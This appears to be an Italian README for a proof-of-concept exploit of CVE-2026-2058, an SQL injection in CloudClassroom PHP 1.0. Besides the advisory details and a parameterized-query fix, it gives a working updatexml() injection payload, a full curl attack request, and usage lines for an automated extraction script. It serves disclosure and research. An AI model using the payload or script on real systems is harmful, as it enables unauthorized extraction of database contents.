
Proof-of-concept exploit per CVE-2026-2058, una SQL injection nel progetto PHP CloudClassroom, con enumerazione automatica del database ed estrazione dei dati.
Una vulnerabilità di iniezione SQL è presente nella funzionalità Post Query del Progetto PHP CloudClassroom (v1.0).
La vulnerabilità consente agli attaccanti di iniettare comandi SQL arbitrari tramite il parametro POST squeryx, portando a enumerazione del database ed estrazione dei dati.
Questo repository contiene un Proof of Concept (PoC) che dimostra come la vulnerabilità possa essere sfruttata per estrarre dati sensibili dal database backend.
| Campo | Valore |
|---|
| CVE | CVE-2026-2058 |
| Tipo di Vulnerabilità | Iniezione SQL |
| CWE | CWE-89 |
| Software Interessato | Progetto PHP CloudClassroom |
| Versione Interessata | 1.0 |
| Componente | Funzionalità Post Query |
| Vettore di Attacco | Remoto |
| Autenticazione Richiesta | No |
| Impatto | Divulgazione del database |
| Gravità | Alta |
| Riferimento Pattern di Attacco | CAPEC-66 |
POST /postquerypublic
squeryx
Il codice backend concatena direttamente l'input dell'utente in una query SQL senza una corretta sanificazione o query parametrizzate.
Esempio di codice vulnerabile:
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
Poiché $tempsquery deriva dall'input dell'utente, gli attaccanti possono iniettare SQL arbitrario.
Per scopi di test e ricerca, è disponibile un ambiente Docker vulnerabile.
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
La vulnerabilità può essere attivata utilizzando una tecnica di iniezione SQL basata su errori sfruttando la funzione updatexml() di MySQL.
Esempio di payload:
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
Esempio di richiesta curl:
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
Risposta attesa:
XPATH syntax error: '~cc_db~'
Questo repository include uno script bash di exploit che automaticamente:
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
Esempio:
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
Un attaccante può:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L⚠️ Nota: Il punteggio CVSS NVD differisce dal punteggio CNA (VulDB) a causa di diverse valutazioni di impatto.
L'Exploit Prediction Scoring System (EPSS) stima la probabilità che una vulnerabilità venga sfruttata in natura.
| CVE | Probabilità EPSS | Percentile | Data |
|---|---|---|---|
| CVE-2026-2058 | 0.00028 | 7.62 % | 2026-03-01 |
Fonte: Dataset FIRST EPSS
Gli sviluppatori dovrebbero:
Esempio di implementazione sicura:
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();


Questo exploit è fornito solo per scopi educativi e di ricerca.
L'autore non è responsabile per l'uso improprio o i danni causati da questo codice.
bl4dsc4n
Ricercatore di Sicurezza